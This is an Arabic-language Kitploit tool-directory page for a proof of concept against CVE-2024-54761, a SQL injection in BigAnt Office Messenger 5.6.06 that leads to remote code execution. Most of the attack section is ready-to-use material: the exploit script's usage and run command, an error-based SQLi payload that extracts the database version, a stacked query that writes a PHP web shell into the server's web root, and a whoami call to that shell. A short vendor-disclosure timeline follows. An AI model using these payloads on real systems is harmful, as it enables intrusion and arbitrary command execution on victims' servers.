Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-54761 — CVE-2024-54761 PoC | Kitploit
أدوات/GitHubGitHub/nscan9/cve-2024-54761
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubnscan9/cve-2024-54761

CVE-2024-54761

CVE-2024-54761 PoC

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

BigAnt Office Messenger 5.6.06 RCE عبر حقن SQL

ثغرة حقن SQL في BigAnt Messenger تؤدي إلى ثغرة تنفيذ أوامر عن بُعد (RCE). اتبع الخطوات التالية للاستغلال.

الاستخدام:

root@kitploit:~
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password (default 123456)

شغّل أداة الاستغلال باستخدام بيانات الاعتماد الافتراضية.

root@kitploit:~
python CVE-2024-54761.py -r 127.0.0.1
استغلال

الاستغلال اليدوي

استخرج إصدار قاعدة البيانات المستخدمة عبر المعامل dev_code المعرّض لحقن SQL.

root@kitploit:~
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

إصدار SQLI ارفع قشرة ويب PHP على الهدف باستخدام استعلامات SQL المكدَّسة.

root@kitploit:~
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

إنشاء قشرة ويب 1 إثبات تنفيذ الأوامر:

root@kitploit:~
/shell.php?cmd=whoami

whoami أمر dir

الجدول الزمني

31-10-2024: أُرسلت الثغرات إلى البائع عبر البريد الإلكتروني

31-10-2024: راسلنا البائع عبر البريد الإلكتروني، دون رد

15-11-2024: راسلنا البائع عبر البريد الإلكتروني، دون رد

15-11-2024: طلبنا أرقام CVE

المراجع

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com

تنزيل الأداة